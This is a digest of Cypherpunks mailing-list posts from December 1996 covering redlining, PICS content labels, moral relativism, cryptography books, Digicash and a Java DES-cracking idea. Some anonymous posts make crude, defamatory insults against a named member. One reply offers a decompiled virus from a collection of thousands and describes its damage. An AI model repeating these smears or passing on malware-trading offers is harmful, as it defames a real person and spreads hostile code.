I believe that in many Medieval and Renaissance societies, even
something as simple as a market could not be established without
approval.

One of the great ideas of the modern age is that people have the right
to form organizations.  It should probably be in the Bill of Rights.
(We do have the right to "peaceably assemble", but that is not as
general as the right to organize.)

You are completely correct that control of human organizational
activity is the hallmark of a totalitarian state.

Back to redlining, it is typically minority groups which are the most
prone to lending only to their own group.  This has been said about
Jewish people, although I haven't seen it in practice.  (Perhaps this
was true a few centuries ago?)  An excellent modern example is the
Korean-American community.  There is a custom to form pools of capital
between small numbers of friends, five would be a typical number.  One
friend is appointed to set up and run the business.  There are very
powerful social prohibitions against failure and consequent loss of
capital.  Very seldom is one of the group anything but Korean.  My
understanding is that this works quite well.  It is hard to find
anything objectionable in the practice.

>> Ironically, discrimination, prejudice, bigotry, hate, etc. are often
>> judged by the public on a "gut level" as well.  It's just a matter of
>> how to "educate" the public to see these things.
>
>Exactly.  Like most, I have a strongly visceral negative reaction to
>bigotry.  I wish there could be a system of law which contained it.
>There cannot, or at least not without doing even more harm.

But what is it that we want to make illegal?  Bigotry is not a well
defined term.  Generally what we object to is people drawing the
"wrong" conclusions about other groups of people.  Certainly, we do
not believe that we should dictate what conclusions people should
draw, any more than we believe we should dictate what they may say.

Do we then believe that we should outlaw the actions they take based
on these beliefs?  So long as the people in question are doing no
harm, I propose we leave them alone to live their lives.

Ironically, I have found that those who are most vocal on the subject
of bigotry are most prone to it themselves.  It isn't okay to make
statements of your belief regarding Albanians - especially poor
Albanians - but it is okay to make any statement about yuppies,
preppies, geeks, nerds, Libertarians, Objectivists, or any other sort
of approved "those people" groups.

I'm sure many readers of this list have had conversations which
abruptly end with "Are you a Libertarian?", which is generally
completely irrelevant to the point under discussion.  What is
happening is that the other person is more interested in knowing your
tribal identification than what you believe.  A pity.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vincent M. Padua" <vincent@psnw.com>
Date: Tue, 10 Dec 1996 18:50:04 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Deeyenda, is a fucking hoax...
Message-ID: <199612110250.SAA15515@sierra.psnw.com>
MIME-Version: 1.0
Content-Type: text/plain


Deeyenda is not a virus, it's a hoax (like "Good Times" and "Irina")

A warning about a virus called Deeyenda is being distributed around the
internet. However, the virus does not exist and this is yet another example
of a growing trend: hoax virus alerts being mistakenly sent all around the
internet.

If you receive the warning about Deeyenda (which has many similarities to
another hoax, "Good Times") be sure to tell the person who sent the warning
to you that it is in fact a hoax, and they should take care not to pass the
hoax warning on to anyone else.

Please quit propogating this bullshit.

//Vince




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Tue, 10 Dec 1996 16:59:30 -0800 (PST)
To: gt@kdn0.attnet.or.jp
Subject: Re: [OFF-TOPIC]Re: PICS is not censorship
In-Reply-To: <4484.9612101411@misun2.mi.leeds.ac.uk>
Message-ID: <32AE0747.2CA5@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Gemini Thunder wrote:
>
> There are universally valid truths.  You implicitly admit so by
> stating "...at most, one religion is correct".

No, he didn't; he said "at most".  I personally think none is correct,
and I don't agree there are universally valid truths.  I defy you to
explain how you know that to be so.

> The problem is we can not always determine what the universally valid
> truth is (especially so in moral/religious matters)

Then why do you think there is such a thing?

> so we tend to cop-out 

Why is it a "cop-out" to accept the limits of human perception?

> and say there are no truths, or something 
> along the lines of:
> 
> "Well, that might be right for you, but not for me."
> 
> or the one I love to hate:
> 
> "Perception is reality."

How do you know reality is something other than perception if you
don't perceive it to be so?

-- 
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
Mike McNally -- Egregiously Pointy -- Tivoli Systems, "IBM" -- Austin
mailto:m5@tivoli.com    mailto:m101@io.com    http://www.io.com/~m101
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DWSKI1283@aol.com
Date: Tue, 10 Dec 1996 16:01:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: take me off the list, please!!!
Message-ID: <961210190110_1652280118@emout17.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


please take me off the mailing list, i cant stand the petty bickering. What a
waste, you guys spend all your time taking potshots at each other instead of
really relevant issues. My sincere apologies to those not involved.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Tue, 10 Dec 1996 17:27:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Apropros of labeling systems...
Message-ID: <32AE0DE0.6BBC@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Yahoo has a Reuter's story covering a policy statement from the American
Academy of Pediatrics.  They're concerned about record content 
description labels; they don't think their "strong" enough.

	If the industry does not develop a stronger voluntary
	system, it said, Congress should impose one.

(I wonder if they really said that Congress should impose a 
stronger voluntary system?)

I wonder when people will realize that the threat of Congress imposing
a ratings system seems functionally equivalent to Congress imposing a
ratings system?

-- 
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
Mike McNally -- Egregiously Pointy -- Tivoli Systems, "IBM" -- Austin
mailto:m5@tivoli.com    mailto:m101@io.com    http://www.io.com/~m101
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 10 Dec 1996 19:36:19 -0800 (PST)
To: "Mark Rosen" <cypherpunks@toad.com>
Subject: Re: The product formerly known as VGP
In-Reply-To: <199612102238.RAA29779@mercury.peganet.com>
Message-ID: <v03007800aed3dd3cbe9f@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:03 PM -0500 12/10/96, Mark Rosen wrote:
>	I am just announcing that I am changing the name of my program,
>Very Good
>Privacy (distinct from Pretty Good Privacy) in response to a complaint from
>PGP, Inc. It was cool, though, because I got an e-mail message from Phil,
>which is akin to talking with God. Just to quell the trademark questions
>some people might have, a trademark violation is defined as something where
>there is a possibility of confusion with another product; as made obvious
>by the hundreds (literally) of messages I have received asking about the
>features of this new version of PGP (which it is not). I have not changed
>the name of the product on the web page, and will just post a notice of
>clarification until I think of a new name. Does anyone have any ideas?
>Thanks.

How about something like "Really Secure Algorithm"?

(I doubt people would confuse your program with the Republic of South
Africa, usually abbreviated as "RSA," so there should be no further
collision problems.)

--Klaus!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Tue, 10 Dec 1996 11:54:15 -0800 (PST)
To: CP <cypherpunks@toad.com>
Subject: Re: Codebreakers on the shelves!
In-Reply-To: <v03007806aed2ec6f864a@[207.167.93.63]>
Message-ID: <9612101953.aa22445@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


In message <v03007806aed2ec6f864a@[207.167.93.63]>, "Timothy C. May" writes:
>As near as I can tell, from the comments by Kahn and from looking at it,
>the new edition is _exactly_ the same as the 1967 edition, with the
>exception of one additional chapter. The last chapter covers the Enigma
>story in detail.

	Is it based on the abridged or unabridged edition?

>I'm hoping the new edition of Bamford is handled better.

	Any news as to a possible release date for that book?

	Derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Tue, 10 Dec 1996 20:02:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Puzzle Palace 2nd edition (1983) Info
Message-ID: <3.0.1.32.19961210195927.01241f10@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:03 AM 12/10/96 -0800, you wrote:

>>Hope that clears things up...
>
>No, I fear you are _confusing_ people with this comment.
>
>Yes, there was a 1983 paperbound edition, with a few new items added to the
>1982 orginal. Ho hum. (I have both, and have for many years. It was finding
>the '92 edition that sparked much of my interest in the NSA, back in 1982.)
>
>What we are waiting for is the _real_ Second Edition, the long-awaited
>revising of "The Puzzle Palace." It is expected later this year or next.

Sorry I was unclear.

Actually I was refering to what _Schneier_ was calling the "Second
edition".  (The penguin edition is more like version 1.1.)

The afterward just seems to be a tacked on collection of fragments.

Hopefully the real Second Edition will add more content.
---
|        "Spam is the Devil's toothpaste!" - stuart@teleport.com         |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 10 Dec 1996 11:16:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: [CRYPTO] E-Cash
Message-ID: <199612101916.UAA06043@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim C[reep] May uses an Adolf Hitler action figure as a dildo.
   ____
   \ _/__  Tim C[reep] May
    \\  /
      \/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Tue, 10 Dec 1996 11:29:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
In-Reply-To: <v03007807aed2edd5da77@[207.167.93.63]>
Message-ID: <Pine.HPP.3.91.961210202436.6251A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


>>What if the PICS classifications were worded so as to describe the factual
>>content of a page rather than the writers opinion of its suitability? This,
>>if correctly implemented, could remove the problem of interpretation.
> 
> Doubful. I contend that any such approach is bound to fail.

I agree with the last statement. Who decides if Great Tits is about
sex or ornithology? (This example has reportedly confused many
admirers of prolific milk-producing tissue searching on AltaVista
ending up at Bird Sites.)

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Tue, 10 Dec 1996 11:36:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Chaum to Step Aside
In-Reply-To: <1.5.4.32.19961209193858.00688674@pop.pipeline.com>
Message-ID: <Pine.HPP.3.91.961210203254.6251B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



> The 6-year-old company plans to make
> Chaum, the ponytailed inventor of Digicash's
> innovative payment system, chief technology
> officer and to hire a new CEO to run the
> company.

I hope they'll find some bigshot who can revive the
momentum of Digicash that existed about a year ago.
That the Digicash promotional press releases still
mention the Swedish Post is a sign of lack of other
examples. It looks like the Swedish Post just bought
the rights and now is having second thoughts, just
sitting on it.

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 10 Dec 1996 19:10:59 -0800 (PST)
To: nobody@cypherpunks.ca (John Anonymous MacDonald)
Subject: Re: PGP 3 Beta testers needed
In-Reply-To: <199612110108.RAA31207@abraham.cs.berkeley.edu>
Message-ID: <199612110304.VAA17784@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


IGNORE ABSOLUTELY ALL FLAMES

FLAMES, TRUE OR FALSE, HAVE ZERO NET PRESENT VALUE

IGOR

John Anonymous MacDonald wrote:
> 
> > lucifer@dhp.com (Anonymous) writes:
> > > All joking aside, is there any reason I shouldn't trust Tim May
> > > (assuming I don't care about his personal details like sexual
> > > preference, etc.)?
> > 
> > Timmy May is a racist (especially hates Jews) and a proven liar.
> > Perhaps this doesn't bother you.
> 
> The "proven liar" thing doesn't really bother me if I don't know what
> he lied about and why.  I mean people say things which are untrue all
> the time, but often by mistake or as a joke.  It's always possible for
> some people to misinterpret what someone is saying or get really upset
> about it when most people just don't think it matters.
> 
> The charges of racism and anti-semitism seem a bit more serious.  I've
> been subscribed to cypherpunks for a couple of years, and have not
> seen any evidence of such an attitude on the list.  I therefore find
> the charges difficult to believe.  However, I'm willing to investiate
> further if you point me in the right direction, as I'd like to know
> about it if Tim May truly is some kind of horrible person.
> 
> Thanks.
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 10 Dec 1996 21:10:19 -0800 (PST)
To: attila@primenet.com
Subject: Re: A New First on this List
In-Reply-To: <199612101719.KAA16046@infowest.com>
Message-ID: <32AE41AA.A79@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


attila@primenet.com wrote:
>    at 07:09 AM, Dale Thorn <dthorn@gte.net> said:
> :: Anonymous wrote (after rude cartoon)
> ::> All joking aside, is there any reason I shouldn't trust Tim May
> ::> (assuming I don't care about his personal details like sexual
> ::> preference, etc.)?

> ::You would be well advised not to trust *anyone* unless:
> ::1. They have *your* personal interests at heart (not likely here) -or-
> ::2. It is necessary for you to trust them for a particular reason,
> ::   and you feel that you can justify the risk (more likely).

>     actually, two [recent] new firsts on this list!
>     1.  Dale is polite.
>     2.  Dale is reasonable.
>     does that mean: "A gentleman is a man who knows _when_ to be rude"
>                      --Oscar Wilde

Ah, c'mon.  You remember what Cap'n Kirk said to the Melkotians (sp?):
"Sure we're killers, we just aren't gonna kill today" (quote very
approximate, and I hope I got the ethnicity right).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Aaron Burnett" <Burnett@vmi.edu>
Date: Tue, 10 Dec 1996 18:12:36 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Virus?
Message-ID: <vines.8416+6WVfmA@IST.VMI.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Has anybody heard of the Monkey_B virus?  If so what does it do exactly?  
Also does anybody know where I could find a downloadable Win95 upgrade 
upgrading Windows 3.x to Win95?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 10 Dec 1996 21:41:21 -0800 (PST)
To: gt@kdn0.attnet.or.jp
Subject: Re: [OFF-TOPIC]Re: PICS is not censorship
In-Reply-To: <4484.9612101411@misun2.mi.leeds.ac.uk>
Message-ID: <32AE4912.3442@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Gemini Thunder wrote:
> "Timothy C. May" <tcmay@got.net> wrote:
> >This was, of course, my point about there being no universally valid truth,
> >and what such anti-fraud statutes must mean about religions.

[snip]

> I just want to comment on this, as this is one of my pet peeves.
> There are universally valid truths.  You implicitly admit so by
> stating "...at most, one religion is correct".
> The problem is we can not always determine what the universally valid
> truth is (especially so in moral/religious matters), so we tend to
> cop-out and say there are no truths, or something along the lines of:

The syllogism I remember goes something like this:

If all things are relative then
the statement I just made is relative (sometimes true and sometimes false).
When the statement is false, something is not relative, but implicitly
absolute.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <nobody@squirrel.owl.de>
Date: Tue, 10 Dec 1996 15:06:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: "I've Always Wondered..."
In-Reply-To: <199612090548.VAA12554@dfw-ix8.ix.netcom.com>
Message-ID: <19961210214400.24763.qmail@squirrel.owl.de>
MIME-Version: 1.0
Content-Type: text/plain


 sue1968@ix17.ix.netcom.com wrote to All:

 s> Hi,

 s> Please excuse this intrusion into your mailbox, but I would like to
 s> tell you about something which will be of interest to you...

Fat chance.

Still, this brings up an interesting point:  Considering the special
abilities of many of the principals here, is there something especially
tasty in store for those net predators who spam this list?

I've always imagined something _very_ special happens to their accounts,
but I may just be a hopeless romantic, I dunno...

If not, why not?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 10 Dec 1996 21:55:23 -0800 (PST)
To: Huge Cajones Remailer <nobody@huge.cajones.com>
Subject: Re: Redlining
In-Reply-To: <199612110147.RAA24444@mailmasher.com>
Message-ID: <32AE4C11.7839@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Huge Cajones Remailer wrote:
> At 5:37 PM 12/10/1996, Jim Wise wrote:
> >On Tue, 10 Dec 1996, Dale Thorn wrote:
> >> The logical implication here is that a thousand people "getting
> >> together" and doing something is no different in principle than one
> >> person doing that something.  Not a valid implication, although the
> >> result is not necessarily false on a per-case basis.

> >Actually, I think this is a very valid implication.  One of the main
> >ways in which statist societies justify their restrictions on
> >individuals is by reifying large bodies of individuals and giving
> >them their own rights and responsibilities _as_a_seperate_entity_.
> >To speak of a mass of individuals, whether you call it a corporation,
> >a collective, or a government, as having a different set of rights
> >than the individuals who make it up, is the heart of statism.

[snip]

If you're saying that it's wrong (bad, whatever) for corporations to have
special protections and so on (taxes, other things) that don't apply to
individuals who are (for example) not part of any corporations, then I
do agree with you.

OTOH, the evils which can be accomplished in practice (never mind theory)
by power groups such as large corporations, which cannot be accomplished
by individuals (or cannot in practice be defended against) are a problem
that society has addressed, sometimes on a case-by-case basis (usually
better), and sometimes through big legislation, which often far outlives
its usefulness.  I hope we're at least seeing the same points.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Tue, 10 Dec 1996 22:11:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [OFF-TOPIC]Re: PICS is not censorship
Message-ID: <199612110610.WAA06225@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



>> and I don't agree there are universally valid truths.  I defy you to
>> explain how you know that to be so.

> Simple.  Let us consider all religions:

Your argument has grown tiresome.
Now is the time on cypherpunks when we dance.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 10 Dec 1996 22:28:47 -0800 (PST)
To: Anonymous <nobody@zifi.genetics.utah.edu>
Subject: Re: Secure Erase for PCs?
In-Reply-To: <199612110355.UAA21125@zifi.genetics.utah.edu>
Message-ID: <32AE5411.6C56@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> Dale Thorn sez:
> >Jamie Lawrence wrote:

[snip]

> >But nobody answered my question:  Is there a shortcut way to do the
> >wipe, say, thirty times?  Ordinarily, I'd run the program thirty
> >times, which would consist of a data write followed by a flush,
> >which would take 30x amount of time.

> Buffered writes won't work for obvious reasons. You must make raw
> writes to the sectors you seek to scramble after you gather information
> about what sectors you want to write.

That much I've known for 15 years or so....

> The innovation you are looking for is
> called "the loop". You can implement "the loop" many ways including
> taping the end of your program to the beginning. Be careful not to
> accidentally twist the paper as this will cause your writes to become reads.
> If you are using punch cards you are SOL. sheesh.
> Remind me not to use any of Dale's "utilities".

You would not likely ever have the opportunity to use such utilities,
since you obviously lack certain basic ingredients of intelligence.
I don't do "user-friendly" GUI programs, but I suppose this list is
full of MAC users for reasons known only to themselves (I don't want
to know).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xenu <Xenu@nym.alias.net>
Date: Tue, 10 Dec 1996 19:28:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Codebreakers on the shelves!
Message-ID: <199612110327.WAA15236@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Subject: Re: Codebreakers on the shelves!

> Date: Tue, 10 Dec 1996 02:36:11 -0800
> From: "Timothy C. May" <tcmay@got.net>

[snip]

> I took a look at it a few days ago, and am disappointed.

[snip]

> However, the public key cryptography revolution is covered in about two or
> three pages (or at least this is my recollection). Brief mention is made of
> Diffie, Hellman, etc., but nothing surprising or new.

2 or 3 pages for public key crypto?  That's disgusting!

> So, it seems a better deal is to get one of the many used copies of the
> original, for $20 or less, and then read any of the many good articles on
> modern cryptography.

I was considering getting a copy of the new edition, but now I think
I'll look for a used 1st edition.

> I'm hoping the new edition of Bamford is handled better.

Let's hope...

> --Tim May


Xenu
<Xenu@nym.alias.net>                         1024/0C436F8D 1996/07/14
PGP KEY Fingerprint  06 94 31 1F 96 EF C9 ED  E9 86 6A AF 6E 10 E2 86

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: cp850

iQCVAgUBMq3wDV4LyFQMQ2+NAQEbcAP9FIj8LxwQB2Jq5MivyRp0Nj1Lo25BnSqk
6phIL7jSNiwZGDa735zD8cIJz+Rh8Fq42MEBX3NczCae3nBr8BBPXLR6k4XKH7wR
u1eWMaqM2Dl5h9w7XwA/Edd1miw/f85gxKIiF7tYE/whkD/bMK8+Ry9Sh9bMDGKm
DowxFvOMwAU=
=wTVs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 10 Dec 1996 22:57:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: [ADMINISTRATIVIUM] Zero-knowledge interactive proofs
Message-ID: <199612110642.WAA04116@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy May carries a turd in his wallet for 
identification purposes.

        ' ' ' ' 
        ^-O-O-^
     -ooO--U--Ooo- Timothy May





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 10 Dec 1996 21:08:31 -0800 (PST)
To: gt@kdn0.attnet.or.jp (Gemini Thunder)
Subject: Re: [OFF-TOPIC]Re: PICS is not censorship
In-Reply-To: <32AE206F.2D021C6D@kdn0.attnet.or.jp>
Message-ID: <199612110448.WAA18528@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Gemini Thunder wrote:
> Mike McNally wrote:
> > Gemini Thunder wrote:
> > > There are universally valid truths.  You implicitly admit so by
> > > stating "...at most, one religion is correct".
> > 
> > No, he didn't; he said "at most".  I personally think none is correct,
> > and I don't agree there are universally valid truths.  I defy you to
> > explain how you know that to be so.
> 
> Simple.  Let us consider all religions:
> 
> Now, here are our possibilities:
> 1.  All are right
> 2.  One or more is right, the remaining are wrong
> 3.  None are right
> 
> One of these possibilities must be true, but we can not know which one.
> (This is why "at most" is the very phrase that implictly admits there
> must be some universal truth concerning the validity of religions)

The fact that the universal truth exists is useless of the truth
cannot be found.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Psionic Damage <zerofaith@mail.geocities.com>
Date: Tue, 10 Dec 1996 22:56:23 -0800 (PST)
To: "Aaron Burnett" <Burnett@vmi.edu>
Subject: Re: Virus?
Message-ID: <199612110649.WAA16287@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain


Would you like a decompiled version of the Monkey_B virus, because I have
over 6000 virii, including that one, if so, mail me personally. It corrupts
your boot sector, and sooner or later, deletes your files.


At 09:10 PM 12/10/96 EST, you wrote:
>
>
>----------geoboundary
>Content-Type: text/html; charset=us-ascii
>Content-Transfer-Encoding: 7bit
>
>
>
><HTML>
><BODY>
><CENTER>
><A HREF="http://www.geocities.com">Postage paid by: <IMG
SRC="http://www.geocities.com/pictures/newgeobt.gif"></A></CENTER>
></BODY>
></HTML>
>
>----------geoboundary
>
>
>
>Has anybody heard of the Monkey_B virus?  If so what does it do exactly?  
>Also does anybody know where I could find a downloadable Win95 upgrade 
>upgrading Windows 3.x to Win95?
>
>----------geoboundary--
>
----------------------------------------------------------------------------
----------------------------------------------------------------------------
----------------------
Zer0 Faith Inc. H/P/A/V/C UNDER-WORLD
www.geocities.com/SiliconValley/Heights/2608

MEMBERZ:

GATEMASTER, VIRIZZ, KRASH, EVIL TWIN, KORRUPT, PHONEHAZORD, PSIONIC DAMAGE,
ORPHEUS (the pirate), MANTICORE, ERADICATOR, PSYCHODROME, BIONIC SMURF,
SONIK, §ILVER KAT, kOBRA, & KRYPTIK!

EMAIL:zerofaith@nlights.net (headquarterz) hakker1@hotmail.com (Delious's
Haus!) hackerz@juno.com (The Gatemaster'z palace) zerofaith@geocities.com
(delivery/help/requests/suggestions)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Dec 1996 20:31:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
In-Reply-To: <199612102104.NAA32212@mailmasher.com>
Message-ID: <207qyD118w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@huge.cajones.com (Huge Cajones Remailer) writes:
> At 9:04 AM 12/10/1996, Black Unicorn wrote:
> >On Tue, 10 Dec 1996, Huge Cajones Remailer wrote:
> >> I believe that ten, or a hundred, or a thousand people should be able
> >> to pool their money and lend it to whomever they please for whatever
> >> reason they like.
> >>
> >> That, essentially, is what a bank is.  I do not believe the government
> >> should dictate which people you, or your bank, are allowed to lend to.
> >
> >Create a bank where the identity of the customers are unknown and you
> >solve the redlining problem.
>
> I can imagine a bank whose depositors are not known.  I can also
> imagine a bank which itself operates anonymously.
>
> How would people borrow money against real estate and remain
> anonymous?  It seems to me that the borrower cannot do so if the real
> estate will act as collateral.
>
> Also, how would an anonymous bank foreclose on a mortgage?

Actually, this is not as wild as it first sounds, even though the location
forms a major part of the price of real estate. (We seem to be talking about
mortgages for primary residences now. Actually, the bigger problem with
redlining is the banks' refusal to extend loans to business venture (such as
retail stores) in neighborhoods they consider too risky.)

Suppose the bank deals with a middleman (perhaps even a government agency -
something in the spirit of Sally Maie, Freddie Mac, and Fannie May) that
guarantees that the collateral is worth a certain amount and the bank can
set the interest rate based on the borrower's crddit history etc. If the
bank forecloses, they get the value of the collateral from the middleman. A
bank would charge lower rates because they wouldn't have to deal with the
potential foreclosures.

Alternatively, the information about the location can be held in a kind of
escrow while the mortage is being negotiated and disclosed to the bank
immediately after they agree on terms. The bank can pull out if they, e.g.,
disagree with the appraisal.

Anonymous transactions are surprisingly common in financial markets (I again
refer you to Solnik's book for some examples). I used to work with a very
curious kind of transaction called "principal bid". Let's suppose that you
own 10,000 shares of IBM and you want to sell them and buy 150,000 shares of
Novell with the proceeds. If you do it through a regular broker, it'll cost
you a great deal in both commission cost and market impact. For large
transactions ($20M+) asset managers use the following technique:

Compose a description of the package you're trying to buy/sell. You might
list things like the number of shares you're trying to buy and sell, the
average closing price from the day before, some indication of market
capitalization, liquidity, bid/ask spread, etc. Fax it over to your brokers
who *can't* determine from this information which stocks you're trying to
trade. (If they could, they would manupulate the market against you.) Based
on the description you supply, the brokers send in bids in the form "closing
price plus n cents", where n is usually between 5 and 20 cents. This is done
in the afternoon and the closing price for that day is not known to either
party. The lowest bidder buys/sells the package at the close minus/plus
the n cents and finds out afterwards what he got (a cat in the bag indeed).
The other bidders don't even know what got traded.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Tue, 10 Dec 1996 23:37:51 -0800 (PST)
To: Ray Arachelian <cypherpunks@toad.com
Subject: Re: Java DES breaker?
In-Reply-To: <Pine.SUN.3.91.961210112058.1282A-100000@beast.brainlink.com>
Message-ID: <v03007802aed40c1165e1@[204.31.235.150]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:26 AM -0800 12/10/96, Ray Arachelian wrote:
>While Java isn't a workhorse performance wise, it's very simple for
>anyone with a half decent browser to use java applets.  Writing an
>implementation of DES in Java should be fairly easy, however it will run
>slow on most browsers.  This performance drop will make it far easier for
>Joe Webuser to easily help break DES for us.

I have a client who needs strong crypto routines in Java.  (They want
maintain the privacy of their customer's data when stored on the customer's
disk.)  They need the platform independence that Java provides.  I would
appreciate pointers to implementations.  (BTW - I already know about the
Systemics routines.)

Thanks - Bill


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 10 Dec 1996 21:14:34 -0800 (PST)
To: devnull@manifold.algebra.com
Subject: Re: The product formerly known as VGP
In-Reply-To: <v03007800aed3dd3cbe9f@[207.167.93.63]>
Message-ID: <199612110510.XAA18700@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
> At 2:03 PM -0500 12/10/96, Mark Rosen wrote:
> >	I am just announcing that I am changing the name of my program,
> >Very Good Privacy
> >the name of the product on the web page, and will just post a notice of
> >clarification until I think of a new name. Does anyone have any ideas?
> >Thanks.
> 
> How about something like "Really Secure Algorithm"?
> 

I was thinking about creating a Committee of Concerned Computer
Programmers, abbreviated as CCCP.

To Mark Rosen: name it Cryptographic Utility for Network Transmissions.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Tue, 10 Dec 1996 23:37:53 -0800 (PST)
To: Jim Byrd <cypherpunks@toad.com
Subject: Re: Patriots should use PGP
In-Reply-To: <3.0.32.19961210104240.006dd358@super.zippo.com>
Message-ID: <v03007804aed40ea30085@[204.31.235.150]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:42 AM -0800 12/10/96, Jim Byrd wrote:
